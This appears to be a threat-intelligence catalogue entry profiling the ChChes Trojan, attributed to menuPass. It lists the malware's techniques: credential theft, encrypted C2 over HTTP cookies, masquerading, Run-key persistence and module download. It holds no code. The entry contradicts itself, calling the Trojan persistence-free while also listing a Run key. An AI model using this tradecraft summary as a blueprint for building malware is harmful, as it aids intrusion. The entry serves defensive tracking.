ChChes is a Trojan that appears to be used exclusively by menuPass. It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. [1] [2] [3]

ID: S0144
Associated Software: Scorpion, HAYMAKER

Platforms: Windows

Version: 1.0

Associated Software Descriptions

HAYMAKERBased on similarities in reported malware behavior and open source reporting, it is assessed that the malware named HAYMAKER by FireEye is likely the same as the malware ChChes. [4] [5]

Techniques Used

EnterpriseT1116Code SigningChChes samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked.[1][2][3]
EnterpriseT1003Credential DumpingChChes steals credentials stored inside Internet Explorer.[3]
EnterpriseT1024Custom Cryptographic ProtocolChChes can encrypt C2 data with a custom technique using MD5, base64-encoding, and RC4.[1][2]
EnterpriseT1089Disabling Security ToolsChChes can alter the victim's proxy configuration.[3]
EnterpriseT1083File and Directory DiscoveryChChes collects the victim's %TEMP% directory path and version of Internet Explorer.[4]
EnterpriseT1036MasqueradingChChes copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe).[3]
EnterpriseT1057Process DiscoveryChChes collects its process identifier (PID) on the victim.[1]
EnterpriseT1060Registry Run Keys / Startup FolderChChes establishes persistence by adding a Registry Run key.[3]
EnterpriseT1105Remote File CopyChChes is capable of downloading files, including additional modules.[1][2][4]
EnterpriseT1071Standard Application Layer ProtocolChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.[1][2]
EnterpriseT1032Standard Cryptographic ProtocolChChes can encrypt C2 traffic with AES.[1][2]
EnterpriseT1082System Information DiscoveryChChes collects the victim hostname, window resolution, and Microsoft Windows version.[1][3]


Groups that use this software: